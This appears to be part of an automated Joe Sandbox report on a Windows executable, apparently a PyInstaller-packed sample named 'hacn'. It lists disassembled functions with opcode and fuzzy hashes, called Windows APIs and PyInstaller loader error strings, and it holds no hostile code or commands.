                                                                                                                                          • Opcode ID: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                          • Instruction ID: 32b69c15069fda3e1cb61a297d1bcfb0c7f73609eb99018473384e4fa7480216
                                                                                                                                          • Opcode Fuzzy Hash: 7645c0c2d2fce03d3aab2d1fd33ee4a3925b53edade4cf92fedf68089910dc30
                                                                                                                                          • Instruction Fuzzy Hash: C751E336614BA186D6389F36A4581BAB7A1FB99B75F004131EBCE83794EF3CD085DB10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                          • Opcode ID: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                                                                                          • Instruction ID: cb678554d80d9f987fe5566c5b7d34c3b5cd69727c3d6d5a3ac0e82d601fb8be
                                                                                                                                          • Opcode Fuzzy Hash: 17c3eaeb34264a701bb66d7ce4ab8a897af2982fe98c3a48157bd34433a5c608
                                                                                                                                          • Instruction Fuzzy Hash: 5212A472E0C943AAFB20EB14D354679F661EB42F64F984135E689876C4EF3DE484EB04
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                          • Opcode ID: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                          • Instruction ID: afae3c7b619ab4573092ec32a6e015a41ec52c0c1bdcbe35337de91586c8ce1c
                                                                                                                                          • Opcode Fuzzy Hash: 7160b50ef5c5d9843a5fd5f0d5cd643ebb1f382f7049b3f2f81a6a7c29ab944c
                                                                                                                                          • Instruction Fuzzy Hash: E912B972E0CA43A6FB24DB15D2442BAF271FB42F70F884235D69A866C4EF7CE4508B54
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message
                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                          • API String ID: 2030045667-3659356012
                                                                                                                                          • Opcode ID: 9bc86620ee487ce21f5b89473777ec4549ed41894a2ed8362a4f7e3270b7e078
                                                                                                                                          • Instruction ID: 7b09c7f437e1a20cc14a74ba1f9021bbe2589f5576f5feb8021f789d745c4b59
                                                                                                                                          • Opcode Fuzzy Hash: 9bc86620ee487ce21f5b89473777ec4549ed41894a2ed8362a4f7e3270b7e078
                                                                                                                                          • Instruction Fuzzy Hash: 5B319335F08E4396EA24DB61A9405BAE3A0EF06FE8F584131DE4D87A95FE3DE5418780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                          • Opcode ID: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                                                                                          • Instruction ID: 66b9b68cbe0df2b36663fc039a444ff4c45605fe9e3e8b9cde98453f8d2e3308
                                                                                                                                          • Opcode Fuzzy Hash: 5b2106ab85fd7efcab108e3077ecf48f9db79865e243ba23a6eb4b146be1c4dd
                                                                                                                                          • Instruction Fuzzy Hash: A1E17F73E08B418AEB209B3594412ADB7A0FB56BACF144535EE4D97B59EF38E180C790
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D328847
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D32889E
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharMultiWide
                                                                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                          • API String ID: 626452242-27947307
                                                                                                                                          • Opcode ID: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
                                                                                                                                          • Instruction ID: b1e8324014076e568ed06514d40307947c06b6cef12b7dcdd281c38065ecb76b
                                                                                                                                          • Opcode Fuzzy Hash: 98e3f50c3a54fb3626cc495b15e5889180a4fd66a07709a9bac3ea4f6983fc88
                                                                                                                                          • Instruction Fuzzy Hash: 30417432A09F4282E660CF25B84017AF7A1FB46BA4F544135EA8D87B95EF3DD455C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00007FF61D3239EA), ref: 00007FF61D328D31
                                                                                                                                            • Part of subcall function 00007FF61D3229E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14
                                                                                                                                            • Part of subcall function 00007FF61D3229E0: MessageBoxW.USER32 ref: 00007FF61D322AF0
                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00007FF61D3239EA), ref: 00007FF61D328DA5
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                          • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                          • API String ID: 3723044601-27947307
                                                                                                                                          • Opcode ID: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                                                                                          • Instruction ID: 0e502a9605c8b65732c7bc038552c514b8da8c22927c1512d1ccb67cc3d28537
                                                                                                                                          • Opcode Fuzzy Hash: df8f2b068844af15c3f6e460c074a8b6e33bcf198047290cefaa6cf113e0804d
                                                                                                                                          • Instruction Fuzzy Hash: F5217C35B0AF4285EB109F26B840179B661AF96FA4B544636DA4D83BA4FF3CE5058380
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                          • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                          • API String ID: 3231891352-3501660386
                                                                                                                                          • Opcode ID: b8edc2df1dc3824726c17e6b328eac6ac6c51d76222b1f2205ec89629566f1b2
                                                                                                                                          • Instruction ID: 7b3e9532cf9b5f3661f87d59d8e5813483cd292733324d76e03de014d6a1c64e
                                                                                                                                          • Opcode Fuzzy Hash: b8edc2df1dc3824726c17e6b328eac6ac6c51d76222b1f2205ec89629566f1b2
                                                                                                                                          • Instruction Fuzzy Hash: 75515EB1E0DE5345FE65AB39AA512B9D291AF46FB8F444131E90DC76D6FF6CE4008380
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DF3D
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DF4B
                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DF75
                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DFBB
                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF61D32E16A,?,?,?,00007FF61D32DE5C,?,?,00000001,00007FF61D32DA79), ref: 00007FF61D32DFC7
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                          • String ID: api-ms-
                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                          • Opcode ID: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                                                                                          • Instruction ID: 9db77ed2686f2e88a3ca649f23db27a209cf3411e1ad7830a3847c2537ff685f
                                                                                                                                          • Opcode Fuzzy Hash: 9872d352a920fe7d45116cdfab482bad5ae926fb7a0a3cc3bdcd692ff81b7137
                                                                                                                                          • Instruction Fuzzy Hash: B631E232E1AE42A4FE159B26B844575A394BF4AFB8F1A0534DE1D8B380FF3CE4558384
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A
                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF61D3279B1,00000000,?,00000000,00000000,?,00007FF61D32154F), ref: 00007FF61D32748F
                                                                                                                                            • Part of subcall function 00007FF61D322B30: MessageBoxW.USER32 ref: 00007FF61D322C05
                                                                                                                                          Strings
                                                                                                                                          • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF61D3274EA
                                                                                                                                          • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF61D3274A3
                                                                                                                                          • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF61D327466
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                          • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                          • API String ID: 1662231829-3498232454
                                                                                                                                          • Opcode ID: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
                                                                                                                                          • Instruction ID: cb538d50eb12c0818190f6301c28590e2dfac907ebf2b7ed4af3edbd85d8427d
                                                                                                                                          • Opcode Fuzzy Hash: 77d71ece404ba1356ce9a902b83c671c0216e67cf3ae39c1a807b2b426092734
                                                                                                                                          • Instruction Fuzzy Hash: 3D31B371F18F8241FE25EB35A9553BAD291BF8AFE4F440431DA4EC2696FF6CE1048680
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A
                                                                                                                                            • Part of subcall function 00007FF61D3229E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF61D3288F2,?,?,?,?,?,?,?,?,?,?,?,00007FF61D32101D), ref: 00007FF61D322A14
                                                                                                                                            • Part of subcall function 00007FF61D3229E0: MessageBoxW.USER32 ref: 00007FF61D322AF0
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328CA0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                          • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                          • API String ID: 3723044601-876015163
                                                                                                                                          • Opcode ID: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
                                                                                                                                          • Instruction ID: a2e8140deb60278e39c8e741a7b3732636b20d258c8cb154402682abd1e768c7
                                                                                                                                          • Opcode Fuzzy Hash: 887d82444744575df418bfd41b6e48fc3edc0b171f656e4d5f6c7ee70eb32595
                                                                                                                                          • Instruction Fuzzy Hash: 60216736B09E4281EB50DB29F840066E361FF86BE8B584536DB5CC3B69FF2DD5518740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                          • Opcode ID: a629ec038ee8b1bdf0b034613ecccd0bd1996640db7e8bb071e29d93dcaf093c
                                                                                                                                          • Instruction ID: 7158d907b49a82267e26a4a495ba8abdec63bce05136d2595cc8bd0b1177547f
                                                                                                                                          • Opcode Fuzzy Hash: a629ec038ee8b1bdf0b034613ecccd0bd1996640db7e8bb071e29d93dcaf093c
                                                                                                                                          • Instruction Fuzzy Hash: 10215B31E0CE86A2FA6CE3719751139E2425F46FB0F544634D93ECAAD6FE2CE4018340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                          • String ID: CONOUT$
                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                          • Opcode ID: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
                                                                                                                                          • Instruction ID: 2789e92f516b9fed4900b4f391c9da9eb7a1c60c978f12532db758cbb616d344
                                                                                                                                          • Opcode Fuzzy Hash: dc1a3cb66a96e2c92b05876df44f34e6b44b08b84d7dcdae92150d4fed606b6a
                                                                                                                                          • Instruction Fuzzy Hash: 69114C31A18E4286E7508F56A854329B6A0FB89FF5F044234EA6DC77A4EF7DD844C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33B997
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33B9CD
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33B9FA
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33BA0B
                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33BA1C
                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF61D3355CD,?,?,?,?,00007FF61D33F2BF,?,?,00000000,00007FF61D33BAA6,?,?,?), ref: 00007FF61D33BA37
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                          • Opcode ID: f58dd15d21904bcc164e31bf50b4b102cc5807a30a5de8de7b746150142607d4
                                                                                                                                          • Instruction ID: fb2708ae4fdd6f25c55d24db33691b80a1f0fd62f550056595683113ddd79866
                                                                                                                                          • Opcode Fuzzy Hash: f58dd15d21904bcc164e31bf50b4b102cc5807a30a5de8de7b746150142607d4
                                                                                                                                          • Instruction Fuzzy Hash: 41115C31A0CE82A2FA68E731D741139E2529F46FB0F544734E87EC66D6FE2CE4118300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
